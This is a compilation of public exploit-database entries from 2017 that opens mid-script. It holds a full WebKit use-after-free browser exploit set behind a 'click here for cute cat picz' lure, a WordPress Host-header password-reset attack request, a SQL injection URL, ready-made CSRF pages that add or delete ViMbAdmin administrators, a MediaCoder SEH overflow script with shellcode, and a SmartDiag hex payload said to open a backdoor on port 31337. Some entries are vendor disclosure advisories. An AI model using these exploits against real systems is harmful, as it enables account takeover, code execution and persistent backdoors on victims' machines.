echo "Exiting..."
exit 0
=============================================
- Discovered by: Dawid Golunski
- dawid[at]legalhackers.com
- https://legalhackers.com
- CVE-2017-8295
- Release date: 03.05.2017
- Revision 1.0
- Severity: Medium/High
=============================================
Source: https://exploitbox.io/vuln/WordPress-Exploit-4-7-Unauth-Password-Reset-0day-CVE-2017-8295.html
If an attacker sends a request similar to the one below to a default Wordpress
installation that is accessible by the IP address (IP-based vhost):
-----[ HTTP Request ]----
POST /wp/wordpress/wp-login.php?action=lostpassword HTTP/1.1
Host: injected-attackers-mxserver.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 56
user_login=admin&redirect_to=&wp-submit=Get+New+Password
------------------------
Wordpress will trigger the password reset function for the admin user account.
Because of the modified HOST header, the SERVER_NAME will be set to
the hostname of attacker's choice.
As a result, Wordpress will pass the following headers and email body to the
/usr/bin/sendmail wrapper:
------[ resulting e-mail ]-----
Subject: [CompanyX WP] Password Reset
Return-Path: <wordpress@attackers-mxserver.com>
From: WordPress <wordpress@attackers-mxserver.com>
Message-ID: <e6fd614c5dd8a1c604df2a732eb7b016@attackers-mxserver.com>
X-Priority: 3
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
Someone requested that the password be reset for the following account:
http://companyX-wp/wp/wordpress/
Username: admin
If this was a mistake, just ignore this email and nothing will happen.
To reset your password, visit the following address:
<http://companyX-wp/wp/wordpress/wp-login.php?action=rp&key=AceiMFmkMR4fsmwxIZtZ&login=admin>
-------------------------------
As we can see, fields Return-Path, From, and Message-ID, all have the attacker's
domain set.
The verification of the headers can be performed by replacing /usr/sbin/sendmail with a
bash script of:
#!/bin/bash
cat > /tmp/outgoing-email
<!--
Sources:
https://phoenhex.re/2017-05-04/pwn2own17-cachedcall-uaf
https://github.com/phoenhex/files/blob/master/exploits/cachedcall-uaf.html
Overview
The WebKit bug we used at Pwn2Own is CVE-2017-2491 / ZDI-17-231, a use-after-free of a JSString object in JavaScriptCore. By triggering it, we can obtain a dangling pointer to a JSString object in a JavaScript callback. At first, the specific scenario seems very hard to exploit, but we found a rather generic technique to still get a reliable read/write primitive out of it, although it requires a very large (~28 GiB) heap spray. This is possible even on a MacBook with 8 GB of RAM thanks to the page compression mechanism in macOS.
-->
<script>
function make_compiled_function() {
function target(x) {
return x*5 + x - x*x;
}
// Call only once so that function gets compiled with low level interpreter
// but none of the optimizing JITs
target(0);
return target;
}
function pwn() {
var haxs = new Array(0x100);
for (var i = 0; i < 0x100; ++i)
haxs[i] = new Uint8Array(0x100);
// hax is surrounded by other Uint8Array instances. Thus *(&hax - 8) == 0x100,
// which is the butterfly length if hax is later used as a butterfly for a
// fake JSArray.
var hax = haxs[0x80];
var hax2 = haxs[0x81];
var target_func = make_compiled_function();
// Small helper to avoid allocations with .set(), so we don't mess up the heap
function set(p, i, a,b,c,d,e,f,g,h) {
p[i+0]=a; p[i+1]=b; p[i+2]=c; p[i+3]=d; p[i+4]=e; p[i+5]=f; p[i+6]=g; p[i+7]=h;
}
function spray() {
var res = new Uint8Array(0x7ffff000);
for (var i = 0; i < 0x7ffff000; i += 0x1000) {
// Write heap pattern.
// We only need a structure pointer every 128 bytes, but also some of
// structure fields need to be != 0 and I can't remember which, so we just
// write pointers everywhere.
for (var j = 0; j < 0x1000; j += 8)
set(res, i + j, 0x08, 0, 0, 0x50, 0x01, 0, 0, 0);
// Write the offset to the beginning of each page so we know later
// with which part we overlap.
var j = i+1+2*8;
set(res, j, j&0xff, (j>>8)&0xff, (j>>16)&0xff, (j>>24)&0xff, 0, 0, 0xff, 0xff);
}
return res;
}
// Spray ~14 GiB worth of array buffers with our pattern.
var x = [
spray(), spray(), spray(), spray(),
spray(), spray(), spray(), spray(),
];
// The butterfly of our fake object will point to 0x200000001. This will always
// be inside the second sprayed buffer.
var buf = x[1];
// A big array to hold reference to objects we don't want to be freed.
var ary = new Array(0x10000000);
var cnt = 0;
// Set up objects we need to trigger the bug.
var n = 0x40000;
var m = 10;
var regex = new RegExp("(ab)".repeat(n), "g");
var part = "ab".repeat(n);
var s = (part + "|").repeat(m);
// Set up some views to convert pointers to doubles
var convert = new ArrayBuffer(0x20);
var cu = new Uint8Array(convert);
var cf = new Float64Array(convert);
// Construct fake JSCell header
set(cu, 0,
0,0,0,0, // structure ID
8, // indexing type
0,0,0); // some more stuff we don't care about
var container = {
// Inline object with indebufng type 8 and butterly pointing to hax.
// Later we will refer to it as fakearray.
jsCellHeader: cf[0],
butterfly: hax,
};
while (1) {
// Try to trigger bug
s.replace(regex, function() {
for (var i = 1; i < arguments.length-2; ++i) {
if (typeof arguments[i] === 'string') {
// Root all the callback arguments to force GC at some point
ary[cnt++] = arguments[i];
continue;
}
var a = arguments[i];
// a.butterfly points to 0x200000001, which is always
// inside buf, but we are not sure what the exact
// offset is within it so we read a marker value.
var offset = a[2];
// Compute addrof(container) + 16. We write to the fake array, then
// read from a sprayed array buffer on the heap.
a[2] = container;
var addr = 0;
for (var j = 7; j >= 0; --j)
addr = addr*0x100 + buf[offset + j];
// Add 16 to get address of inline object
addr += 16;
// Do the inverse to get fakeobj(addr)
for (var j = 0; j < 8; ++j) {
buf[offset + j] = addr & 0xff;
addr /= 0x100;
}
var fakearray = a[2];
// Re-write the vector pointer of hax to point to hax2.
fakearray[2] = hax2;
// At this point hax.vector points to hax2, so we can write
// the vector pointer of hax2 by writing to hax[16+{0..7}]
// Leak address of JSFunction
a[2] = target_func;
addr = 0;
for (var j = 7; j >= 0; --j)
addr = addr*0x100 + buf[offset + j];
// Follow a bunch of pointers to RWX location containing the
// function's compiled code
addr += 3*8;
for (var j = 0; j < 8; ++j) {
hax[16+j] = addr & 0xff;
addr /= 0x100;
}
addr = 0;
for (var j = 7; j >= 0; --j)
addr = addr*0x100 + hax2[j];
addr += 3*8;
for (var j = 0; j < 8; ++j) {
hax[16+j] = addr & 0xff;
addr /= 0x100;
}
addr = 0;
for (var j = 7; j >= 0; --j)
addr = addr*0x100 + hax2[j];
addr += 4*8;
for (var j = 0; j < 8; ++j) {
hax[16+j] = addr & 0xff;
addr /= 0x100;
}
addr = 0;
for (var j = 7; j >= 0; --j)
addr = addr*0x100 + hax2[j];
// Write shellcode
for (var j = 0; j < 8; ++j) {
hax[16+j] = addr & 0xff;
addr /= 0x100;
}
hax2[0] = 0xcc;
hax2[1] = 0xcc;
hax2[2] = 0xcc;
// Pwn.
target_func();
}
return "x";
});
}
}
</script>
<button onclick="pwn()">click here for cute cat picz!</button>
Source: https://blogs.securiteam.com/index.php/archives/3171
Vulnerability Details
Jenkins is vulnerable to a Java deserialization vulnerability. In order to trigger the vulnerability two requests need to be sent.
The vulnerability can be found in the implementation of a bidirectional communication channel (over HTTP) which accepts commands.
The first request starts a session for the bi-directional channel and is used for “downloading” data from the server. The HTTP header “Session” is the identifier for the channel. The HTTP header “Side” specifies the “downloading/uploading” direction.
The second request is the sending component of the bidirectional channel. The first requests is blocked until the second request is sent. The request for a bidirectional channel is matched by the “Session” HTTP header which is just a UUID.
Proof of Concept
In order to exploit the vulnerability, an attacker needs to create a serialized payload with the command to execute by running the payload.jar script.
The second step is to change python script jenkins_poc1.py:
- Adjust target url in URL variable
- Change file to open in line “FILE_SER = open(“jenkins_poc1.ser”, “rb”).read()” to your payload file.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41965.zip
Source: http://www.defensecode.com/advisories/DC-2017-02-011_WordPress_WebDorado_Gallery_Plugin_Advisory.pdf
DefenseCode ThunderScan SAST Advisory
WordPress WebDorado Gallery Plugin - SQL Injection Vulnerability
Advisory ID: DC-2017-02-011
Software: WordPress WebDorado Gallery Plugin
Software Language: PHP
Version: 1.3.29 and below
Vendor Status: Vendor contacted, vulnerability confirmed
Release Date: 20170502
Risk: Medium
1. General Overview
During the security audit, multiple security vulnerabilities were discovered in WordPress
WebDorado Gallery Plugin using DefenseCode ThunderScan application source code security
analysis platform.
More information about ThunderScan is available at URL:
http://www.defensecode.com
2. Software Overview
According to the plugin developers, WebDorado, Gallery plugin is a fully responsive
WordPress gallery plugin with advanced functionality that is easy to customize and has
various views. It has more than 300,000 downloads on wordpress.org.
Homepage:
https://wordpress.org/plugins/photo-gallery/
https://web-dorado.com/products/wordpress-photo-gallery-plugin.html
http://www.defensecode.com/advisories/DC-2017-02-011_WordPress_WebDorado_Gallery_Plugin_Advisory.pdf
3. Vulnerability Description
During the security analysis, ThunderScan discovered SQL injection vulnerability in WebDorado
Gallery WordPress plugin. The easiest way to reproduce the vulnerability is to visit the provided
URL while being logged in as administrator or another user that is authorized to access the
plugin settings page. Any user with such privileges can obtain the valid bwg_nonce value by
previously visiting the settings page. Users that to do not have full administrative privileges
could abuse the database access the vulnerability provides to either escalate their privileges
or obtain and modify database contents they were not supposed to be able to.
3.1 SQL injection
Function: $wpdb->get_col($query)
Variable: $_GET['album_id']
Sample URL:
http://server/wp-admin/adminajax.php?action=addAlbumsGalleries&album_id=0%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5))
)VvZV)&width=700&height=550&bwg_items_per_page=20&bwg_nonce=b939983df9&TB_iframe=1
File: photo-gallery\admin\models\BWGModelAddAlbumsGalleries.php
26 $album_id = ((isset($_GET['album_id'])) ? esc_html(stripslashes($_GET['album_id'])) :
((isset($_POST['album_id'])) ? esc_html(stripslashes($_POST['album_id'])) : ''));
...
28 $page_nav = $this->model->page_nav($album_id);
File: photo-gallery\admin\views\BWGViewAddAlbumsGalleries.php
41 public function page_nav($album_id) {
...
44 $query = "SELECT id FROM " . $wpdb->prefix . "bwg_album WHERE published=1 AND id<>" .
$album_id . " " . $where . " UNION ALL SELECT id FROM " . $wpdb->prefix . "bwg_gallery WHERE
published=1 " . $where;
45 $total = count($wpdb->get_col($query));
4. Solution
Vendor resolved the security issues in one of the subsequent releases. All users are strongly
advised to update WordPress WebDorado Gallery plugin to the latest available version. Version
1.3.38 no longer seems to be vulnerable.
5. Credits
Discovered by Neven Biruski with DefenseCode ThunderScan source code security analyzer.
6. Disclosure Timeline
20170404 Vendor contacted
20170405 Vendor responded: “Thanks for noticing and told us about this, we will
take into account and will fix the issues with upcoming update.”
? Update released
20170502 Latest plugin version tested. Vulnerability seems fixed.
Advisory released to the public.
http://www.defensecode.com/advisories/DC-2017-02-011_WordPress_WebDorado_Gallery_Plugin_Advisory.pdf
7. About DefenseCode
DefenseCode L.L.C. delivers products and services designed to analyze and test web, desktop
and mobile applications for security vulnerabilities.
DefenseCode ThunderScan is a SAST (Static Application Security Testing, WhiteBox Testing)
solution for performing extensive security audits of application source code. ThunderScan
performs fast and accurate analyses of large and complex source code projects delivering
precise results and low false positive rate.
DefenseCode WebScanner is a DAST (Dynamic Application Security Testing, BlackBox Testing)
solution for comprehensive security audits of active web applications. WebScanner will test a
website's security by carrying out a large number of attacks using the most advanced
techniques, just as a real attacker would.
Subscribe for free software trial on our website http://www.defensecode.com
E-mail: defensecode[at]defensecode.com
Website: http://www.defensecode.com
Twitter: https://twitter.com/DefenseCode/
# [CVE-2017-6086] Multiple CSRF vulnerabilities in ViMbAdmin version 3.0.15
## Product Description
ViMbAdmin is a web-based interface used to manage a mail server with virtual domains, mailboxes and aliases. It is an open source solution developed by Opensolutions and distributed under the GNU/GPL license version 3. The official web site can be found at http://www.vimbadmin.net and the source code of the application is available on github https://github.com/opensolutions.
## Details
**CVE ID**: CVE-2017-6086
**Access Vector**: remote
**Security Risk**: high
**Vulnerability**: CWE-352
**CVSS Base Score**: 8.8
**CVSS vector**: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
## Proof of concept
### Add administrator user
#### Exploit
The following html/javascript code allows to delete an administrator user. It needs to be visited by a logged administrator of the targeted ViMbAdmin application.
```html
<head>
<title>CSRF ViMbAdmin</title>
</head>
<body>
<iframe style="display:none" name="csrf-frame"></iframe>
<form id="csrf-form" action="http://<target ip>/admin/add" method="POST" target="csrf-frame" >
<input type="text" name="user" value="target@email" >
<input type="text" name="password" value="newpassword" >
</form>
<script>document.getElementById("csrf-form").submit()</script>
</body>
```
#### Vulnerable code
The vulnerable code is located in the `addAction()` method of the `<vimbadmin directory>/application/controllers/DomainController.php` file.
### Remove administrator user
#### Exploit
The following html/javascript code allows to delete an administrator user. It needs to be visited by a logged administrator of the targeted ViMbAdmin application.
```html
<head>
<title>CSRF ViMbAdmin</title>
</head>
<body>
<iframe style="display:none" name="csrf-frame"></iframe>
<form id="csrf-form" action="http://<target ip>/admin/purge/aid/<administrator id>" method="GET" target="csrf-frame" >
</form>
<script>document.getElementById("csrf-form").submit()</script>
</body>
```
#### Vulnerable code
The vulnerable code is located in the `purgeAction()` method of the `<vimbadmin directory>/application/controllers/DomainController.php` file.
### Change administrator password
#### Exploit
The following html/javascript code allows to update administrator password. It needs to be visited by a logged administrator of the targeted ViMbAdmin application.
```html
<head>
<title>CSRF ViMbAdmin</title>
</head>
<body>
<iframe style="display:none" name="csrf-frame"></iframe>
<form id="csrf-form" action="http://<target ip>/admin/password/aid/<administrator id>" method="POST" target="csrf-frame" >
<input type="text" name="password" value="newpassword" >
</form>
<script>document.getElementById("csrf-form").submit()</script>
</body>
```
#### Vulnerable code
The vulnerable code is located in the `passwordAction()` method of the `<vimbadmin directory>/application/controllers/DomainController.php` file.
### Add mailbox address
#### Exploit
The following html/javascript code allows to update administrator password. It needs to be visited by a logged administrator of the targeted ViMbAdmin application.
```html
<head>
<title>CSRF ViMbAdmin</title>
</head>
<body>
<iframe style="display:none" name="csrf-frame"></iframe>
<form id="csrf-form" action="http://<target ip>/mailbox/add/did/<domain id>" method="POST" target="csrf-frame" >
<input type="text" name="local_part" value="<fakeemail>" >
<input type="text" name="domain" value="<domain id>" >
<input type="text" name="name" value="<fake name>" >
<input type="text" name="password" value="<password>" >
<input type="text" name="quota" value="0" >
<input type="text" name="alt_email" value="" >
<input type="text" name="cc_welcome_email" value="" >
</form>
<script>document.getElementById("csrf-form").submit()</script>
</body>
```
#### Vulnerable code
The vulnerable code is located in the `addAction()` method of the `<vimbadmin directory>/application/controllers/MailboxController.php` file.
### Purge mailbox
#### Exploit
The following html/javascript code allows to remove a mailbox address. It needs to be visited by a logged administrator of the targeted ViMbAdmin application.
```html
<head>
<title>CSRF ViMbAdmin</title>
</head>
<body>
<iframe style="display:none" name="csrf-frame"></iframe>
<form id="csrf-form" action="http://<target ip>/mailbox/purge/mid/<mailbox id>" method="POST" target="csrf-frame" >
<input type="text" name="data" value="purge" >
</form>
<script>document.getElementById("csrf-form").submit()</script>
</body>
```
#### Vulnerable code
The vulnerable code is located in the `purgeAction()` method of the `<vimbadmin directory>/application/controllers/MailboxController.php` file.
### Archive mailbox
#### Exploit
The following html/javascript code allows to force the archival of a mailbox address. It needs to be visited by an administrator of the targeted ViMbAdmin application.
```html
<head>
<title>CSRF ViMbAdmin</title>
</head>
<body>
<iframe style="display:none" name="csrf-frame"></iframe>
<form id="csrf-form" action="http://<target ip>/archive/add/mid/<mailbox id>" method="GET" target="csrf-frame" >
</form>
<script>document.getElementById("csrf-form").submit()</script>
</body>
```
#### Vulnerable code
The vulnerable code is located in the `addAction()` method of the `<vimbadmin directory>/application/controllers/ArchiveController.php` file.
### Add alias address
#### Exploit
The following html/javascript code allows to force the archival of a mailbox address. It needs to be visited by an administrator of the targeted ViMbAdmin application.
```html
curl 'http://<ip>/alias/add/did/<domain id>' --data 'local_part=<fake mailbox>&domain=<domain id>&goto%5B%5D=<redirection email address>'
<head>
<title>CSRF ViMbAdmin</title>
</head>
<body>
<iframe style="display:none" name="csrf-frame"></iframe>
<form id="csrf-form" action="http://<target ip>/alias/add/did/<domain id>" method="POST" target="csrf-frame" >
<input type="text" name="local_part" value="<fake mailbox>" >
<input type="text" name="domain" value="<domain id>" >
<input type="text" name="goto[]" value="<redirection email address>" >
</form>
<script>document.getElementById("csrf-form").submit()</script>
</body>
```
#### Vulnerable code
The vulnerable code is located in the `addAction()` method of the `<vimbadmin directory>/application/controllers/AliasController.php` file.
### Remove alias address
#### Exploit
The following html/javascript code allows the removal of a alias address. It needs to be visited by a logged administrator of the targeted ViMbAdmin application.
```html
<head>
<title>CSRF ViMbAdmin</title>
</head>
<body>
<iframe style="display:none" name="csrf-frame"></iframe>
<form id="csrf-form" action="http://<target ip>/alias/delete/alid/<alias id>" method="GET" target="csrf-frame" >
</form>
<script>document.getElementById("csrf-form").submit()</script>
</body>
```
#### Vulnerable Code
The vulnerable code is located in the `addAction()` method of the `<vimbadmin directory>/application/controllers/AliasController.php` file.
## Affected version
* tested on version 3.0.15
## Timeline (dd/mm/yyyy)
* 22/01/2017 : Initial discovery.
* 16/02/2017 : First contact with opensolutions.io
* 16/02/2017 : Advisory sent.
* 24/02/2017 : Reply from the owner, acknowledging the report and planning to fix the vulnerabilities.
* 13/03/2017 : Sysdream Labs request for an update.
* 29/03/2017 : Second request for an update.
* 29/03/2017 : Reply from the owner stating that he has no time to fix the issues.
* 03/05/2017 : Full disclosure.
## Credits
* Florian NIVETTE, Sysdream (f.nivette -at- sysdream -dot- com)
#!/usr/bin/python
# Exploit Title : MediaCoder 0.8.48.5888 Local Buffer Overflow (SEH)
# CVE : CVE-2017-8869
# Exploit Author : Muhann4d @0xSecured
# Vendor Homepage : http://www.mediacoderhq.com
# Vulnerable Software: http://www.mediacoderhq.com/mirrors.html?file=MediaCoder-0.8.48.5888.exe
# Vulnerable Version : 0.8.48.5888
# Fixed version : 0.8.49.5890 http://www.mediacoderhq.com/mirrors.html?file=MediaCoder-0.8.49.5890.exe
# Category : Local Buffer Overflow
# Tested on OS : Windows 7 Pro SP1 32bit
# How to : Open MediaCoder then drag & drop the .m3u file in it and then press the START button.
# or just write click on the .mu3 file .. open with .. MediaCoder
# Timeline :
# 2017-05-05: Vulnerability discovered, vendor has been contaced
# 2017-05-08: Vendor replied denying it .."I believe this was an old issue and no longer exists in the latest version"
# 2017-05-09: A POC sent to the vendor.
# 2017-05-11: New version is released. According to http://blog.mediacoderhq.com/changelog/
# 2017-06-26: Exploit released.
print "MediaCoder 0.8.48.5888 Local Exploit By Muhann4d @0xSecured"
from struct import pack
junk = "http://" + "\x41" * 361
nseh = pack('<I',0x909006eb)
seh = pack('<I',0x66017187)
nops= "\x90" * 20
#calc.exe
shell=("\xbe\xb6\x06\x32\x7a\xda\xd1\xd9\x74\x24\xf4\x5a\x29\xc9\xb1"
"\x31\x31\x72\x13\x03\x72\x13\x83\xea\x4a\xe4\xc7\x86\x5a\x6b"
"\x27\x77\x9a\x0c\xa1\x92\xab\x0c\xd5\xd7\x9b\xbc\x9d\xba\x17"
"\x36\xf3\x2e\xac\x3a\xdc\x41\x05\xf0\x3a\x6f\x96\xa9\x7f\xee"
"\x14\xb0\x53\xd0\x25\x7b\xa6\x11\x62\x66\x4b\x43\x3b\xec\xfe"
"\x74\x48\xb8\xc2\xff\x02\x2c\x43\xe3\xd2\x4f\x62\xb2\x69\x16"
"\xa4\x34\xbe\x22\xed\x2e\xa3\x0f\xa7\xc5\x17\xfb\x36\x0c\x66"
"\x04\x94\x71\x47\xf7\xe4\xb6\x6f\xe8\x92\xce\x8c\x95\xa4\x14"
"\xef\x41\x20\x8f\x57\x01\x92\x6b\x66\xc6\x45\xff\x64\xa3\x02"
"\xa7\x68\x32\xc6\xd3\x94\xbf\xe9\x33\x1d\xfb\xcd\x97\x46\x5f"
"\x6f\x81\x22\x0e\x90\xd1\x8d\xef\x34\x99\x23\xfb\x44\xc0\x29"
"\xfa\xdb\x7e\x1f\xfc\xe3\x80\x0f\x95\xd2\x0b\xc0\xe2\xea\xd9"
"\xa5\x13\x1a\xd0\x33\x83\x85\x81\x7e\xc9\x35\x7c\xbc\xf4\xb5"
"\x75\x3c\x03\xa5\xff\x39\x4f\x61\x13\x33\xc0\x04\x13\xe0\xe1"
"\x0c\x70\x67\x72\xcc\x59\x02\xf2\x77\xa6")
junkD = "D" * (2960 - (len(junk + nseh + seh + nops + shell)))
exploit = junk + nseh + seh + nops + shell + junkD
try:
file= open("Exploit.m3u",'w')
file.write(exploit)
file.close()
raw_input("\nExploit has been created!\n")
except:
print "There has been an Error"
# Exploit Title: Gemalto SmartDiag Diagnosis Tool <= v2.5 - Buffer Overflow
- SEH Overwrite
# Date: 16-03-2017
# Software Link: http://support.gemalto.com/index.php?id=download_tools
# Exploit Author: Majid Alqabandi
# Contact: https://www.linkedin.com/in/majidalqabandi/
# CVE: CVE-2017-6953
# Category: Local - command execution - Buffer Overflow - SEH Overwrite.
# Vendor notified: 17-04-2016
1. Description
SymDiag.exe is vulnerable to buffer overflow, SEH overwrite.
When trying to (Register a new card), Input fields are vulnerable to stack
overflow attack which leads to code execution and other possible security
threats.
2. Proof of Concept
The following PoC is provided code will:
- Exploit the vulnerability.
- Execute shell code.
- Create a backdoor on port 31337.
To exploit, start SmartDiag.exe tool, choose "Register a new card", on the
ATR use the following payload (Tested on Win7x64 & Win8x64 - SmartDiag
v2.5):
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
52834000528340005283400052834000572b0410477f40008c214100f494
400041ed40003b4140003552011078ab0110010000009cf2021000100000
328b031040000000d02203100120400026e6400090909090e2f500109090
909090909090909090909090909090909090909090909090909090909090
909090909090909090909090909090909090909090909090909090909090
909090909090909090909090909090909090909090909090909090909090
909090909090909090909090909090909090909090909090909090909090
909090909090909090909090909090909090909090909090909090909090
9090909090909090ddc1d97424f4bbc4aa698a5833c9b15683e8fc315814
0358d0489c7630055f87c076e962f1a48de7a378c5aa4ff28b5ec4760450
6d3c725f6ef0ba33ac92464ee0747681f575bffcf524688aa7d81dce7bd8
f144c3a2749ab71876cb671630f30c70e102c162dd4d6e50954fa6a8567e
8667694e0b79ad69f30cc5898e161ef3549283531f046065ccd3e369b990
ac6d3c74c78ab57b081b8d5f8c4756c1952d39fec68ae65a8c39f3ddcf55
30d0efa55e638397c1df0b948af9ccdba1be432249bf4ae11defe4c01d64
f5edc82ba541a28b152212647cad4d947f67f892b153a974b06337ec3d85
adfe6b1d593d4896fe3eba8a57a9f2c46fd602c3dc7baa8496976fb4a9bd
c7bf92569dd151c6a2fb016b3060d1e2293f86a39c36425e86e070a35eca
3078a3d5b90d9ff1a9cb20be9d8376684b6221da253c9eb4a1b9ec06b7c5
38f15777954468b8714111a4e1aec86c11e550c4baa00154a752fc9bded0
f46325c87d61614e6e1bfa3b9088fb69AAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
3. Solution:
Vendor has been informed and confirmed the issue, no fix is available yet
from vendor.